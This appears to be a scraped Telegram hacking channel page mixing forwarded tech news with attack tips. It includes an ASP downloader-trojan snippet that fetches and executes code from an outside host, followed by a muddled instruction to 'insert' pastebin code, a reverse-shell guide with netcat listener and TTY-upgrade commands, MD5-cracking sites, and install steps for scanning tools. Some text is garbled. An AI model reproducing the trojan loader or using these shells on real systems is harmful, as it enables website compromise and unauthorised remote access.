UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.1K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
Forwarded from UNDERCODE NEWS
LeTV sued Fan Bingbing for a dispute over a results contract and the court is due to take place on 14 September
#international
Forwarded from UNDERCODE NEWS
Feature exposure for Apple iPad 2020: Highly narrow bezel and wide screen available in September #technologies #leaks
Forwarded from UNDERCODE NEWS
Apple AppStore Appeal Process officially launched, allowing developers to question decisions
#international
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Session Hijacking Attacks :
#forbeginers

- Session hijacking attacks exploit a valid web session to gain access to a computer network or system. Session hijacking is also informally known as cookie hijacking.

- Since there are several TCP connections involved in HTTP networking, there is often a method involved in the identification of web users. Whether a particular method is suitable is determined by a session token sent by a web server to the user’s browser following successful authentication. A session ID or session token is a string of varying lengths given to a visitor upon their first visit to a site. There are many ways to incorporate a session ID; it can be worked into the URL or the header of the https request received, or stored as a cookie.

S p e c i f i c a l l y :

1) Most browser sessions and web applications are susceptible to session ID attacks, though most can be used to hijack just about any system out there.

2) Session hijacking attacks, or cookie hijacking attacks, steal or imitate a session token to gain access to a system.

M E T H O D E S :

There are several different ways to compromise a session token:


1) By predicting a weak session token

2) Through session sniffing

3) By means of client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc.)

4) Through man-in-the-middle (MITM) attacks (phishing, etc.)

ubuntu forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Passive vulnerability auditor :

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) git clone https://github.com/AeonDave/doork doork
doork works with Python version 2.6.x and 2.7.x on any platform. You have also to install

2) pip install beautifulsoup4

3) pip install requests

4) pip install Django

5)cd doork

6) python doork.py

#fastTips
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Channel photo updated
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ONLINE CRACKING :
Decrypt MD5 Hashed Strings 2020 WEBSITES :

1) md5online.org

2) md5crack.com

3) md5cracker.org

4) md5decrypt.org

5) crackstation.net

6) hashkiller.co.uk

7) reverse-hash-lookup.online-domain-tools.com

8) md5decrypt.net

9) onlinehashcrack.com

10) cmd5.org

βœ…
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘WEB HACKING #METHODE :

1) This time the user is a downloader Trojan. The hacker inserted the following code under foot.asp in the root directory of the website through the website upload vulnerability:


<%
'by*
aming Function Gethtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
Gethtml=ObjXMLHTTP .responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode = 3
objStream.Open
objStream.Write Gethtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
Gethtml = objStream.ReadText
objStream.Close
set objStream=Nothing
End Function
execute(Gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))
%>

2) The problem can be solved by clearing this code. The results of the website Trojan cleaning experts
- The content of xmlasaquan.txt is as follows:

then insert this code :

https://pastebin.com/Xr4x50Za

enjoyβ€οΈπŸ‘πŸ»
written
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Reverse-Shells #FastTips ipsThis plays an integral part for owning machines. There are various reverse shells available and the most used among them is

β€œPentest Monkey PHP reverse shell” available at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet .

> Do also check out https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Met hodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

1) Please ensure the the IP address you specied remains correct while inside php reverse shell. Verify it by ifcong tun0.

2) On usual approaches and if it is php-reverse-shell; simply reload the url location, a continuous loop with blank screen will surely generate the shell back the the terminal where netcat is listening.

3) I believe you have some knowledge of creating a Netcat Listener. nc -lvnp 4444 <- This is the port on which it is listening. Can be changed to something else too!

4) On occasions you get reverse shell but not tty shell, you can get it via the command- python -c β€˜import pty; pty.spawn(β€œ/bin/bash”)’

5) Upgrading to fully interactive TTY shell (working arrow keys and CTRL-C won’t kill the reverse shell session). After python -c β€˜import pty; pty.spawn(β€œ/bin/bash”)’ , hit CTRL-z (this will background the nc session). then on kali machine type β€œstty raw -echo β€œ and enter. again, type β€œfg” and enter. (input cannot be seen after hitting stty command so simply type
This will now give fully interactive TTY shell as if you were logged in via SSH.

6) For reference: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

7) the method of interactive TTY only works in linux. For windows alternative, rlwrap can be used.

Only arrow keys work and CTRL-C will kill the nc session in this case. Can be installed by:

$ apt install rlwrap -y

Usage: $ rlwrap nc -lnvp 4444


enjoyβ€οΈπŸ‘πŸ»
hack lib
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Another web hacking #tool

F E A T U R E S :

-A port scanner

-SQL injection scanner

-Dork checker

-Hash cracker

-Hash type verification tool

-Proxy finding tool

-XSS scanner

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) git clone https://github.com/Ekultek/Pybelt.git

2) cd Pybelt

3) pip install -r requirements.txt

4) C O M M A N D S:

python pybelt.py -p 127.0.0.1 Will run a port scan on your local host

python pybelt.py -s http://example.com/php?id=2 Will run a SQLi scan on the given URL

python pybelt.py -d idea?id=55 Will run a Dork check on the given Google Dork

python pybelt.py -c 9a8b1b7eee229046fc2701b228fc2aff:all Will attempt to crack the hash using all algorithms available on the computer

python pybelt.py -v 098f6bcd4621d373cade4e832627b4f6 Will try to verify the hash type

python pybelt.py -f Will find usable proxies

python pybelt.py -x http://127.0.0.1/php?id=1 Will search the URL for XSS vulnerability

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁